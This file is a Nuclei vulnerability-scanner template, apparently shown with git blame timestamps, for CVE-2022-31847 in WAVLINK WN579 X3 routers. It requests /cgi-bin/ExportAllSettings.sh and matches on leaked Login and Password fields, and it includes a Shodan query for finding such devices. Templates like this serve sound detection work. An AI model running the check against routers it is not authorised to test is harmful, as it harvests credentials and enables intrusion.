nuclei-templates/http/cves/2022/CVE-2022-31847.yaml

45 lines
1.4 KiB
YAML
Raw Normal View History

2022-08-14 20:18:03 +00:00
id: CVE-2022-31847
info:
name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
author: arafatansari
severity: high
description: |
WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.
2022-08-14 20:18:03 +00:00
reference:
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md
2022-08-15 06:17:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-31847
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-08-15 06:17:46 +00:00
cve-id: CVE-2022-31847
cwe-id: CWE-668
2023-07-11 19:49:27 +00:00
epss-score: 0.0072
cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:*
2022-08-14 20:18:03 +00:00
metadata:
max-request: 1
2022-08-14 20:18:03 +00:00
shodan-query: http.html:"Wavlink"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: wavlink
product: wn579x3_firmware
2022-08-15 06:17:46 +00:00
tags: cve,cve2022,wavlink,exposure
2022-08-14 20:18:03 +00:00
http:
2022-08-15 06:17:46 +00:00
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
2022-08-14 20:18:03 +00:00
matchers-condition: and
matchers:
2022-08-15 06:17:46 +00:00
- type: word
words:
- 'Login='
- 'Password='
- 'Model='
- 'AuthMode='
condition: and
2022-08-14 20:18:03 +00:00
- type: status
status:
- 200